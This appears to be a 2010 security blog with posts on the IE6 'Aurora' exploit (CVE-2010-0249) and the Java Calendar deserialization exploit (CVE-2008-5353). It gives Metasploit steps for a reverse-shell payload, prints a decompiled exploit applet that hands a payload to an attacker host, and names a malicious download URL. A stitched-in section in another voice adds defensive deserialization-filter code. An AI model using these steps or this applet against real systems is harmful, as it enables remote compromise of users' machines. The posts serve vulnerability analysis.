Sunday, January 17, 2010

CVE-2010-0249 - Internet Explorer 6 mshtml.dll Remote Code Execution

Remote Code Execution in mshtml.dll in Internet Explorer 6


CVE-2010-0249 is the vulnerability used in the targeted attack on Google; it affects mshtml.dll, one of the DLL components of IE 6.

This post demonstrates the recently released Metasploit "Aurora" module that implements this exploit.

I am not able to post the exploit code here; probably it was blocked by Google's blog platform, as the shellcode or the JavaScript code is detected by them.

The shellcode is obfuscated, and I deobfuscated it using HIEW.

Obviously, once decoded, the shellcode payload downloads an additional file from the URL http://demo1.ftpaccess.cc/demo/ad.jpg and performs further malicious activity.

Reference

[1] http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js -- Wepawet analysis
[2] http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb -- ie_aurora.rb Metasploit Aurora Exploit Module

Friday, January 15, 2010

[News] Yet Another PDF & IE Attack

Yet Another PDF & IE Attack

If you are not aware of the recent attacks on Google from China, you might want to visit the F-Secure blog: http://www.f-secure.com/weblog/archives/00001854.html. To summarize the F-Secure post, this is known to be another targeted attack by cybercriminals to obtain intellectual property, that is, sensitive information, in this case from Chinese activists.

This attack is believed to be driven by exploits of 0-day vulnerabilities in various well-known applications such as Adobe Acrobat/Reader and Internet Explorer 6, 7 and 8. The exploit drops a DLL component, which is installed as a service and opens a backdoor so that a remote computer can fully compromise the infected machine. A description of this backdoor can be found on F-Secure's description page or under Symantec's Trojan.Hydraq.

SANS also provides an analysis of the PDF exploit, which they call "PDF Babushka". As a result of this attack, Google has announced that it will stop censoring google.cn; more information can be found on the Official Google Blog: A new approach to China.

Update (17/01/2010)

Wepawet was the first to release the exploit code, which is one of the attack vectors used in the targeted attack on Google. The exploit only affects IE 6, which does not have DEP (Data Execution Prevention) enabled, unlike IE 7 on Windows XP SP3 and IE 8.

Needless to say, IE 6 contains plenty of potential 0-day vulnerabilities which have yet to be discovered. For the Google targeted attacks, there are probably other 0-day vulnerabilities for IE 7 and IE 8 which have not yet been revealed.

Reference

[1] http://isc.sans.org/diary.html?n&storyid=8002 -- Exploit code available for CVE-2010-0249
[2] http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js -- Exploit CVE-2010-0249 Source Code
[3] http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb -- Metasploit "Aurora" Module


~Signing off
@x9090

Saturday, January 9, 2010

CVE-2008-5353 - Old Java Exploit In the Wild

Java Calendar Deserialize Exploit In The Wild - CVE-2008-5353

This is my first post in 2010. Hurray &(^_^)&
Of course, this is not good news, as there is a Java exploit in the wild which is rather out of date. The vulnerability has been documented as CVE-2008-5353.

The exploit uses a Java applet exploiting CVE-2008-5353. It is not hard to find the PoC (or a real exploit) on the Internet, as it has existed for quite some time. Since Metasploit already includes the PoC in the Framework, I will demonstrate it:

  1. Select the exploit multi/browser/java_calendar_deserialize.
  2. Set the payload generic/shell_reverse_tcp. NOTE: generic/shell_bind_tcp does not work in this case.
  3. Set the options. URIPATH can be any promising path name ;) LHOST is the attacker's server address.
  4. Recheck the options.
  5. Execute the exploit.
  6. From the remote computer 192.168.0.108, visit the URL http://192.168.0.108/sexy_bridtney and see the result.
  7. 0wning... :)

A quick glance at the exploit applet. This is actually the exploit code decompiled from Metasploit's Applet.jar:

// Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.kpdus.com/jad.html
// Decompiler options: packimports(3)
// Source File Name:   AppletX.java

package msf.x;

import java.applet.Applet;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;

// Referenced classes of package msf.x:
//            PayloadX, LoaderX

public class AppletX extends Applet
{

    public AppletX()
    {
    }

    public void init()
    {
        try
        {
            // StringToBytes decodes the embedded hex string into the raw
            // serialized-object bytes; readObject() on that crafted stream
            // is what triggers CVE-2008-5353
            ObjectInputStream oin = new ObjectInputStream(new ByteArrayInputStream(PayloadX.StringToBytes(serializedObject)));
            Object deserializedObject = oin.readObject();

            // If deserialization succeeded and the loader class is in place,
            // hand the applet parameters (payload data, LHOST, LPORT) to it
            if(deserializedObject != null && LoaderX.instance != null)
            {
                String data = getParameter("data");
                String lhost = getParameter("lhost");
                String lport = getParameter("lport");
                if(data == null)
                    data = "";
                LoaderX.instance.bootstrapPayload(data, lhost, lport != null ? Integer.parseInt(lport) : 4444);
            }
        }
        catch(Exception exception) { }
    }

    private static final long serialVersionUID = 0xd30f41af207ff1c8L;
    // Hex-encoded serialized object; the full string is truncated on the
    // original page and only this fragment of it survives
    private static final String serializedObject = "...E53747265616D490008737461727444617949000E73746172744461794F665...";
    public static String data = null;

}

The hex string in serializedObject is the serialized object that triggers the vulnerability; PayloadX.StringToBytes converts it to a byte array and ObjectInputStream.readObject() deserializes it. More information can be found in the Reference section.
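To make the security-relevant point of that code concrete, here is an added example of my own (not code from the original post, and not Metasploit's): the same hex-to-bytes decoding followed by a blind readObject(), as the applet does, next to the same deserialization behind a java.io.ObjectInputFilter allow-list (Java 9+). The class names Greeting and DeserFilterDemo and the helper names are my choices; a harmless java.util.Calendar instance created at runtime stands in for unexpected input, so no exploit bytes are involved.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

// Stand-in for the kind of object a legitimate application expects to receive.
// Constructed for this example; not part of the Metasploit applet.
class Greeting implements Serializable {
    private static final long serialVersionUID = 1L;
    final String text;
    Greeting(String text) { this.text = text; }
}

public class DeserFilterDemo {

    // Same job as the applet's PayloadX.StringToBytes: turn a hex string into
    // the raw serialized-object bytes (my own implementation, not Metasploit's).
    static byte[] hexToBytes(String hex) {
        if (hex.length() % 2 != 0) {
            throw new IllegalArgumentException("odd-length hex string");
        }
        byte[] out = new byte[hex.length() / 2];
        for (int i = 0; i < out.length; i++) {
            out[i] = (byte) Integer.parseInt(hex.substring(2 * i, 2 * i + 2), 16);
        }
        return out;
    }

    static String bytesToHex(byte[] data) {
        StringBuilder sb = new StringBuilder(data.length * 2);
        for (byte b : data) {
            sb.append(String.format("%02X", b));
        }
        return sb.toString();
    }

    // Serialize an object and hex-encode it, the way the applet embeds its payload.
    static String serializeToHex(Object obj) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(obj);
        }
        return bytesToHex(bos.toByteArray());
    }

    // What AppletX.init() does: instantiate whatever the bytes describe.
    // Any Serializable class on the classpath may be constructed, which is
    // why a crafted java.util.Calendar stream could reach CVE-2008-5353.
    static Object deserializeUnfiltered(String hex) throws IOException, ClassNotFoundException {
        try (ObjectInputStream oin = new ObjectInputStream(new ByteArrayInputStream(hexToBytes(hex)))) {
            return oin.readObject();
        }
    }

    // Hardened variant: an ObjectInputFilter allow-list. Only the named classes
    // may be instantiated; "!*" rejects everything else, so a stream carrying
    // java.util.Calendar (or anything unexpected) is refused when its class
    // descriptor is read, before any of its readObject/readResolve code runs.
    // The max* limits also bound depth, reference count and stream size.
    static Object deserializeFiltered(String hex) throws IOException, ClassNotFoundException {
        ObjectInputFilter allowList = ObjectInputFilter.Config.createFilter(
                "Greeting;java.lang.String;maxdepth=3;maxrefs=16;maxbytes=4096;!*");
        try (ObjectInputStream oin = new ObjectInputStream(new ByteArrayInputStream(hexToBytes(hex)))) {
            oin.setObjectInputFilter(allowList);
            return oin.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Expected input: accepted by both paths.
        String good = serializeToHex(new Greeting("hello"));
        System.out.println("unfiltered : " + ((Greeting) deserializeUnfiltered(good)).text);
        System.out.println("filtered   : " + ((Greeting) deserializeFiltered(good)).text);

        // Unexpected input: a Calendar, the class family abused by the original
        // exploit (a harmless instance here, no exploit bytes involved).
        String unexpected = serializeToHex(java.util.Calendar.getInstance());
        System.out.println("unfiltered : " + deserializeUnfiltered(unexpected).getClass().getName());
        try {
            deserializeFiltered(unexpected);
        } catch (InvalidClassException e) {
            // The filter rejected the class descriptor before the object was built
            System.out.println("filtered   : rejected (" + e.getMessage() + ")");
        }
    }
}
```

Run it with `java DeserFilterDemo.java` on JDK 11 or later. The unfiltered path happily produces a java.util.GregorianCalendar from bytes it was never meant to accept; the filtered path throws InvalidClassException with "filter status: REJECTED". The same pattern string can be applied process-wide through the jdk.serialFilter system property, which is the practical mitigation where the deserializing code itself cannot be changed.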


Reference

[1] http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html -- Calendar Bug
[2] http://www.metasploit.com/modules/exploit/multi/browser/java_calendar_deserialize -- Metasploit Module Browser - multi/browser/java_calendar_deserialize
[3] http://isc.sans.org/diary.html?n&storyid=7879 -- Report of Java Object Serialization exploit in use in web drive-by attacks